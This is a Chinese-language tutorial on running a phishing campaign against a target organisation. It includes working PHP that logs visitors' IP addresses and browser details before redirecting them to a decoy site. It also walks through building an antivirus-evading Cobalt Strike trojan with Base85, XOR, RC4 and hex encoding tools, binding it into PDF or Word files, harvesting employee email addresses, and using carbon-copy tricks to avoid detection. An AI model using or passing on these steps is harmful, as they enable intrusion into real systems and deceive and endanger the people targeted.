常规钓鱼手法

0x01 简介

第一步发送探针,探测对方人员安全意识、网络环境等;第二步发送免杀exe
细分下来大概就是:
服务器搭建web存放探针文件 注册一个与目标相似的邮箱 生成短链接发送;
CS生成c的paylaod shellcode免杀 捆绑pdf、word等文件并添加图标 发送木马。

0x02 探针部分

vps开启web服务并安装php环境
1
php探针代码

1
2
3
4
5
6
7
8
<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cHJvYmVpbmZv.txt","a");
fwrite($fp,"Date: ".$time." IP: ".$ip." UA:".$user_agent."\n");
fclose($fp);
header('location:https://www.pinduoduo.com/');?>

主要是记录访问者访问时间、IP、UA信息并保存

我这里设置名字为index.php,然后在最后加了一个跳转到pdd首页,这个根据具体情况修改

cHJvYmVpbmZv.txt是存放所有访问记录的文件,base加密防止被别人轻易找到
2
根据出口IP和UA信息可以大致判断出对方网络环境是办公网还是家庭宽带、手机还是PC及浏览器信息。

用qq邮箱注册了一个英文账号
也可以防止被邮件服务器当成垃圾邮件
5

0x03 制作木马

涉及到的工具:https://github.com/Pizz33/GobypassAV-shellcode

生成payload
3

使用Base85+XOR+RC4+hex免杀
替换encode.go里边的shellcode内容执行

1
go run en.go

这一步有可能会被检测,如果生成不成功可以关闭杀软再次尝试
4

将以上加密后的结果替换到decode.go中encodedMessage参数执行

1
go build decode.go

这个工具目前免杀效果还是很不错的
生成的exe需要用管理员权限执行

捆绑

工具:https://github.com/Yihsiwei/GoFileBinder

邮箱收集
邮箱查询个人用得比较多的是https://phonebook.cz
另外还有几个其他的
https://hunter.io
http://www.skymem.info
https://www.email-format.com/i/search

发送的时候收件人可以写自己,然后抄送给目标员工,这样不容易被发现